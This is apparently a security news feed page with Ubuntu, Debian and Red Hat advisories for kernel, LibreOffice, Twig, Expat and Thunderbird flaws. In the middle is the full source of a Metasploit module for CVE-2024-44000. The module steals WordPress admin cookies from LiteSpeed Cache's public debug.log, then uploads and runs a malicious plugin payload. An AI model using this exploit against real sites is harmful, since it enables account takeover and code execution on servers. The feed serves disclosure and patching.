Ubuntu Security Notice 7019-1 - Ziming Zhang discovered that the DRM driver for VMware Virtual GPU did not properly handle certain error conditions, leading to a NULL pointer dereference. A local attacker could possibly trigger this vulnerability to cause a denial of service. Gui-Dong Han discovered that the software RAID driver in the Linux kernel contained a race condition, leading to an integer overflow vulnerability. A privileged attacker could possibly use this to cause a denial of service.

Ubuntu Security Notice USN-7019-1

Debian Linux Security Advisory 5772-1 - Yufan You discovered that Libreoffice's handling of documents based on ZIP archives was susceptible to spoofing attacks when the repair mode attempts to address a malformed archive structure.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5772-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
September 17, 2024                    https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : libreoffice  
CVE ID         : CVE-2024-7788

Yufan You discovered that Libreoffice's handling of documents based on  
ZIP archives was suspectible to spoofing attacks when the repair mode  
attempts to address a malformed archive structure.

For additional information please refer to  
https://www.libreoffice.org/about-us/security/advisories/cve-2024-7788/

For the stable distribution (bookworm), this problem has been fixed in  
version 4:7.4.7-1+deb12u5.

We recommend that you upgrade your libreoffice packages.

For the detailed security status of libreoffice please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/libreoffice

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmbp7VsACgkQEMKTtsN8  
TjY20RAAuJuPyqB0ViM2E/MxqoqTFSzbC9q7XH/5txXMdAQhpxv1HioaiITMFyai  
auAPQTPJcanGdEi2QUwyS8woKXbUJQfCvwKBfUcBD7F8urAB6xeCWV2tHwW1HnI5  
Af169qwqGQ1gU/pSEmatW5BmFB1fGtsaZGuCFWPOiZ8LUgm9RWRxjqZRqsM4N8Ie  
/TIGpHwhoi6gKi04Yq10i7uWeR9YAVSADCljKEIuwUfsV23QGxBnhmLjnSj+d7x1  
uh+CiZdRCS2Z8EYtVhkwS4C9D2vT1Tyj8WktQn2QUG85PAkjjvtuEOxhHY65TOkV  
RXZh7rW7hDF6AYL/wzFvIPFyXg76T5NSqxXiU+P+dqYlMPRgHJG6fLepRZ58V9JP  
LZ4FW13h16t6yeXLg5xiRxviZxczhA8zHZYXXSlyUzB1e+qn2UIg3/qydDiqKlH7  
e3HczIUEU3U+FJ5py9oadsRnZoMS7ZpLN91KYakV62yTcfLTDeBhOM4p04qNoluJ  
thd/egrNaOZNyUknxZHbvC/qcY3T5FIMQcwM3Yg0rlpSKUs69Yiqag8cOYI2JmLl  
peFr8i3xQcPyCsZl2NwkVLVXeiFS4gPYwmv00J+p7C3vnHMk1+MVyry3oZeXWL5X  
ffDlL/Y/6/Ht9hdwC1N79FmDbdNwZ+iEspZYTaeDhOCvfQ0bU9Q=  
=ZHJC  
-----END PGP SIGNATURE-----

Debian Security Advisory 5772-1

Debian Linux Security Advisory 5771-1 - Fabien Potencier discovered that under some conditions the sandbox mechanism of Twig, a template engine for PHP, could by bypassed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5771-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffSeptember 17, 2024                    https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : php-twigCVE ID         : CVE-2024-45411Fabien Potencier discovered that under some conditions the sandboxmechanism of Twig, a template engine for PHP, could by bypassed.For the stable distribution (bookworm), this problem has been fixed inversion 3.5.1-1+deb12u1.We recommend that you upgrade your php-twig packages.For the detailed security status of php-twig please refer toits security tracker page at:https://security-tracker.debian.org/tracker/php-twigFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmbp6wEACgkQEMKTtsN8TjbMmw/9EQoKouvCA3UV7O8WQPnfbILtLGGR4ezpswEqDtV1BRJTtGsa0BL5P4RY7ut8k9pLs/yyUtAjzk5CwikchUFaOYyK8ZHlHugOj3QC2AtdyP8WEqeM226rIqUbTUdO1wcpzVTN4HTl4pKbHYRYNGa8O16sDQsiM805zdauLnbM+LJJpBmoaok6dcg9cNHQ0nUinMoFPU2f2Ap2tDzre+r1CJ8tNajEhD8FZFSXX+50hgooS6hSBA4yATNaMrOYuXetNgG+hF+7LI5zJnERLhzCFiqNc0Kx3G9YWhUNAsIkURB5PIyUQf1Oi4hriUfRGY1MuR7qhCZiDJF3PJxX99eRAijO8wx+pm0FqD8lhQE6X2yniCEY0Nv4ofWX5VAoG7MnZXbFnYGlmoAcqs3BjlYLCX9p11fkfZpOfFyuOyEYVMNJbf8wYB0PIyfzbcf9PiBkV2HdawCUmZEqo4MKJ1/4RpLMk28VZbbD4vGlldGSG9gjSG+r2gfqHKayVvfmp/N0gWaD3H0PQ8NZdXWidqrdy4SmeFLclNC0gYC9XqVe6Xa1PgDgRNw4mdqxuI68/orZeQC3eeXSEjhk41iXDRaWZMG5PFIXAubpFnRrnje+uIl1xNP99w8y/qLRFOWHOYo9//0j6/ohNxJEX44l9zbIphiO8ljPUYu4Ai2eozwdxFE==WH+j-----END PGP SIGNATURE-----

Debian Security Advisory 5771-1

Debian Linux Security Advisory 5770-1 - Shang-Hung Wan discovered multiple vulnerabilities in the Expat XML parsing C library, which could result in denial of service or potentially the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5770-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffSeptember 17, 2024                    https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : expatCVE ID         : CVE-2024-45490 CVE-2024-45491 CVE-2024-45492Shang-Hung Wan discovered multiple vulnerabilities in the ExpatXML parsing C library, which could result in denial of service orpotentially the execution of arbitrary code.For the stable distribution (bookworm), these problems have been fixed inversion 2.5.0-1+deb12u1.We recommend that you upgrade your expat packages.For the detailed security status of expat please refer toits security tracker page at:https://security-tracker.debian.org/tracker/expatFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmbp6EIACgkQEMKTtsN8Tjb+0hAAsAHl9didzh1S8vHaLH8P8I1XT0302RGP1N6r4BKvjEozuTKml28F3NEK9IplBZXH8GM6tnF1/gRJf5Dp4YsL7H+nYUjbkZEdLM2TztRoy4wnITxUwqQ7q1ly/bWMuyaoUn9jZu6SA+yEL68DtbXpFbs8IAOE3kqPsbcWvJ7O7LU3Ajjw5aWYwxV0kdVyI67rBkfWAdyFRjlkxF62+ieR9sjpKNDKK1nmO+I8eEF5E/WOXsfPlzcKwax2mMhisTscEIvaBSKCaQICCojYbvju8KW8B+NsJMsyRbPoimTyzE2n4VBk0ZNHjv+wsIddwdgzXpWHHRbVtl6zjiZvzxUtphp6tHstxoW8YZQKkQiwqqlpONqXKWG1yR0opltUr7JjTylDo41M21yK/WizdxFkdrUJi4drKTONekvbhUEaTLaoR/ywYi0Za7T0sUguAJk25id2px3LdTvMhQywTNmL103LkFfq1WIXL9x+yzYdKos8P3qu9DIaIqmsR4dy2xMhiJwVyQXi74Tte9h5n6FXET1Z8MoyxFOVI6SQ5FBXJMmL48r6Uwhb09tHZL2VNUequSC2L4uGozFFaHvr3M606srokRbo18XvNTNUvApJjAFt/WTnOjKUDuJM08PjLw6brD/XBR6p/NKX8vMQmmXClyKwB97SG1MYu/MfdJK/7wQ==bEe8-----END PGP SIGNATURE-----

Debian Security Advisory 5770-1

This Metasploit module exploits an unauthenticated account takeover vulnerability in LiteSpeed Cache, a WordPress plugin that currently has around 6 million active installations. In LiteSpeed Cache versions prior to 6.5.0.1, when the Debug Logging feature is enabled, the plugin will log admin cookies to the /wp-content/debug.log endpoint which is accessible without authentication. The Debug Logging feature in the plugin is not enabled by default. The admin cookies found in the debug.log can be used to upload and execute a malicious plugin containing a payload.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HTTP::Wordpress  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  class DebugLogError < StandardError; end  class WordPressNotOnline < StandardError; end  class AdminCookieError < StandardError; end  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Wordpress LiteSpeed Cache plugin cookie theft',        'Description' => %q{          This module exploits an unauthenticated account takeover vulnerability in LiteSpeed Cache, a Wordpress plugin          that currently has around 6 million active installations. In LiteSpeed Cache versions prior to 6.5.0.1, when          the Debug Logging feature is enabled, the plugin will log admin cookies to the /wp-content/debug.log endpoint          which is accessible without authentication. The Debug Logging feature in the plugin is not enabled by default.          The admin cookies found in the debug.log can be used to upload and execute a malicious plugin containing a payload.        },        'Author' => [          'Rafie Muhammad', # discovery          'jheysel-r7' # module        ],        'References' => [          [ 'URL', 'https://patchstack.com/articles/critical-account-takeover-vulnerability-patched-in-litespeed-cache-plugin/'],          [ 'CVE', '2024-44000']        ],        'License' => MSF_LICENSE,        'Privileged' => false,        'Platform' => ['unix', 'linux', 'win', 'php'],        'Arch' => [ARCH_PHP, ARCH_CMD],        'Targets' => [          [            'PHP In-Memory',            {              'Platform' => 'php',              'Arch' => ARCH_PHP              # tested with php/meterpreter/reverse_tcp            }          ],          [            'Unix In-Memory',            {              'Platform' => ['unix', 'linux'],              'Arch' => ARCH_CMD              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp            }          ],          [            'Windows In-Memory',            {              'Platform' => 'win',              'Arch' => ARCH_CMD            }          ],        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2024-09-04',        'Notes' => {          'Stability' => [ CRASH_SAFE, ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS],          'Reliability' => [ REPEATABLE_SESSION, ]        }      )    )  end  def check    @admin_cookie = get_valid_admin_cookie    CheckCode::Vulnerable('Found and tested valid admin cookie, we can upload and execute a payload')  rescue WordPressNotOnline => e    return CheckCode::Unknown("This doesn't appear to be a WordPress site: #{e.class}, #{e}")  rescue DebugLogError => e    return CheckCode::Safe("#{e.class}, #{e}")  rescue AdminCookieError => e    return CheckCode::Safe("#{e.class}, #{e}")  end  def extract_cookies(debug_log)    admin_cookies = []    debug_log.each_line do |log_line|      # 09/13/24 15:52:48.009 [192.168.65.1:58695 1 UNP] Cookie: wordpress_70490311fe7c84acda8886406a6d884b=admin%7C1726415372%7C8dXTtGUqH8cjixS1ZU8k58iBmfXRK0xMHXgDZwgjPfn%7C4084023e82a4c58d574ddf33142b168ff5cb93446675ca8116fd32e1de2b8df7; wordpress_logged_in_70490311fe7c84acda8886406a6d884b=admin%7C1726415372%7C8dXTtGUqH8cjixS1ZU8k58iBmfXRK0xMHXgDZwgjPfn%7Cf6bb4d0fdca7b147f320472893374a063b095b550db3488f86e58b6c47e4ce4c      match = log_line.match(/(wordpress(_logged_in)?_[a-f0-9]{32}=[^;]+)/)      admin_cookies << match.captures.compact.join('; ') if match    end    admin_cookies  end  def verify_admin_cookie(admin_cookies)    admin_cookies.each do |admin_cookie|      res = send_request_cgi({        'uri' => '/wp-admin/',        'cookie' => admin_cookie      })      return admin_cookie if res&.code == 200    end    nil  end  def get_valid_admin_cookie    raise WordPressNotOnline unless wordpress_and_online?    res = send_request_cgi({      'uri' => normalize_uri('wp-content', 'debug.log'),      'method' => 'GET'    })    raise DebugLogError, 'There was no /wp-content/debug.log endpoint found on the target to pillage' unless res&.code == 200    raise DebugLogError, 'There were no cookies found inside /wp-content/debug.log' unless res.body.include?('wordpress_logged_in')    admin_cookies = extract_cookies(res.body)    raise AdminCookieError, 'No admin cookies could be found in debug.log' if admin_cookies.blank?    print_status('One or more potential admin cookies were found')    admin_cookie = verify_admin_cookie(admin_cookies)    raise AdminCookieError, 'Admin cookies were found but are invalid' unless admin_cookie    admin_cookie  end  def exploit    unless @admin_cookie      begin        @admin_cookie = get_valid_admin_cookie        print_good('Found and tested valid admin cookie, we can upload and execute a payload')      rescue WordPressNotOnline => e        fail_with(Failure::NotFound, "#{e.class}, #{e}")      rescue DebugLogError, AdminCookieError => e        fail_with(Failure::UnexpectedReply, "#{e.class}, #{e}")      end    end    print_status('Preparing payload...')    plugin_name = Rex::Text.rand_text_alpha(10)    payload_name = Rex::Text.rand_text_alpha(10).to_s    payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")    zip = generate_plugin(plugin_name, payload_name)    print_status('Uploading payload...')    uploaded = wordpress_upload_plugin(plugin_name, zip.pack, @admin_cookie)    fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded    print_status("Executing the payload at #{payload_uri}...")    register_files_for_cleanup("#{payload_name}.php", "#{plugin_name}.php")    register_dir_for_cleanup("../#{plugin_name}")    send_request_cgi({ 'uri' => payload_uri, 'method' => 'GET' })  endend

WordPress LiteSpeed Cache Cookie Theft

This Python script for Linux can analyze Microsoft Windows .msi Installer files and point out potential vulnerabilities.

MSI Analyzer

Red Hat Security Advisory 2024-6726-03 - An update for fence-agents is now available for Red Hat Enterprise Linux 9.4 Extended Update Support. Issues addressed include a code execution vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6726.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: fence-agents security updateAdvisory ID:        RHSA-2024:6726-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6726Issue date:         2024-09-17Revision:           03CVE Names:          CVE-2024-6345====================================================================Summary: An update for fence-agents is now available for Red Hat Enterprise Linux 9.4 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The fence-agents packages provide a collection of scripts for handling remote power management for cluster devices. They allow failed or unreachable nodes to be forcibly restarted and removed from the cluster. Security Fix(es):* pypa/setuptools: Remote code execution via download functions in the package_index module in pypa/setuptools (CVE-2024-6345)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-6345References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2297771

Red Hat Security Advisory 2024-6726-03

Red Hat Security Advisory 2024-6723-03 - An update for thunderbird is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6723.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: thunderbird security update  
Advisory ID:        RHSA-2024:6723-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:6723  
Issue date:         2024-09-17  
Revision:           03  
CVE Names:          CVE-2024-7652  
====================================================================

Summary: 

An update for thunderbird is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

Security Fix(es):

* thunderbird: 115.15/128.2 ()

* mozilla: Type confusion when looking up a property name in a "with" block (CVE-2024-8381)

* mozilla: Internal event interfaces were exposed to web content when browser EventHandler listener callbacks ran (CVE-2024-8382)

* mozilla: Garbage collection could mis-color cross-compartment objects in OOM conditions (CVE-2024-8384)

* mozilla: WASM type confusion involving ArrayTypes (CVE-2024-8385)

* mozilla: SelectElements could be shown over another site if popups are allowed (CVE-2024-8386)

* mozilla: Memory safety bugs fixed in Firefox 130, Firefox ESR 128.2, and Thunderbird 128.2 (CVE-2024-8387)

* thunderbird: Crash when aborting verification of OTR chat (CVE-2024-8394)

* mozilla: Type Confusion in Async Generators in Javascript Engine (CVE-2024-7652)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-7652

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2307331  
https://bugzilla.redhat.com/show_bug.cgi?id=2309427  
https://bugzilla.redhat.com/show_bug.cgi?id=2309428  
https://bugzilla.redhat.com/show_bug.cgi?id=2309430  
https://bugzilla.redhat.com/show_bug.cgi?id=2309431  
https://bugzilla.redhat.com/show_bug.cgi?id=2309432  
https://bugzilla.redhat.com/show_bug.cgi?id=2309433  
https://bugzilla.redhat.com/show_bug.cgi?id=2310481  
https://bugzilla.redhat.com/show_bug.cgi?id=2310490

Red Hat Security Advisory 2024-6723-03

Red Hat Security Advisory 2024-6722-03 - An update for thunderbird is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6722.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: thunderbird security update  
Advisory ID:        RHSA-2024:6722-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:6722  
Issue date:         2024-09-17  
Revision:           03  
CVE Names:          CVE-2024-7652  
====================================================================

Summary: 

An update for thunderbird is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

Security Fix(es):

* thunderbird: 115.15/128.2 ()

* mozilla: Type confusion when looking up a property name in a "with" block (CVE-2024-8381)

* mozilla: Internal event interfaces were exposed to web content when browser EventHandler listener callbacks ran (CVE-2024-8382)

* mozilla: Garbage collection could mis-color cross-compartment objects in OOM conditions (CVE-2024-8384)

* mozilla: WASM type confusion involving ArrayTypes (CVE-2024-8385)

* mozilla: SelectElements could be shown over another site if popups are allowed (CVE-2024-8386)

* mozilla: Memory safety bugs fixed in Firefox 130, Firefox ESR 128.2, and Thunderbird 128.2 (CVE-2024-8387)

* thunderbird: Crash when aborting verification of OTR chat (CVE-2024-8394)

* mozilla: Type Confusion in Async Generators in Javascript Engine (CVE-2024-7652)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-7652

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2307331  
https://bugzilla.redhat.com/show_bug.cgi?id=2309427  
https://bugzilla.redhat.com/show_bug.cgi?id=2309428  
https://bugzilla.redhat.com/show_bug.cgi?id=2309430  
https://bugzilla.redhat.com/show_bug.cgi?id=2309431  
https://bugzilla.redhat.com/show_bug.cgi?id=2309432  
https://bugzilla.redhat.com/show_bug.cgi?id=2309433  
https://bugzilla.redhat.com/show_bug.cgi?id=2310481  
https://bugzilla.redhat.com/show_bug.cgi?id=2310490

Red Hat Security Advisory 2024-6722-03

Red Hat Security Advisory 2024-6721-03 - An update for thunderbird is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.4 Telecommunications Update Service.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6721.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: thunderbird security update  
Advisory ID:        RHSA-2024:6721-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:6721  
Issue date:         2024-09-17  
Revision:           03  
CVE Names:          CVE-2024-7652  
====================================================================

Summary: 

An update for thunderbird is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.4 Telecommunications Update Service.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

Security Fix(es):

* thunderbird: 115.15/128.2 ()

* mozilla: Type confusion when looking up a property name in a "with" block (CVE-2024-8381)

* mozilla: Internal event interfaces were exposed to web content when browser EventHandler listener callbacks ran (CVE-2024-8382)

* mozilla: Garbage collection could mis-color cross-compartment objects in OOM conditions (CVE-2024-8384)

* mozilla: WASM type confusion involving ArrayTypes (CVE-2024-8385)

* mozilla: SelectElements could be shown over another site if popups are allowed (CVE-2024-8386)

* mozilla: Memory safety bugs fixed in Firefox 130, Firefox ESR 128.2, and Thunderbird 128.2 (CVE-2024-8387)

* thunderbird: Crash when aborting verification of OTR chat (CVE-2024-8394)

* mozilla: Type Confusion in Async Generators in Javascript Engine (CVE-2024-7652)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-7652

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2307331  
https://bugzilla.redhat.com/show_bug.cgi?id=2309427  
https://bugzilla.redhat.com/show_bug.cgi?id=2309428  
https://bugzilla.redhat.com/show_bug.cgi?id=2309430  
https://bugzilla.redhat.com/show_bug.cgi?id=2309431  
https://bugzilla.redhat.com/show_bug.cgi?id=2309432  
https://bugzilla.redhat.com/show_bug.cgi?id=2309433  
https://bugzilla.redhat.com/show_bug.cgi?id=2310481  
https://bugzilla.redhat.com/show_bug.cgi?id=2310490

Tag

#linux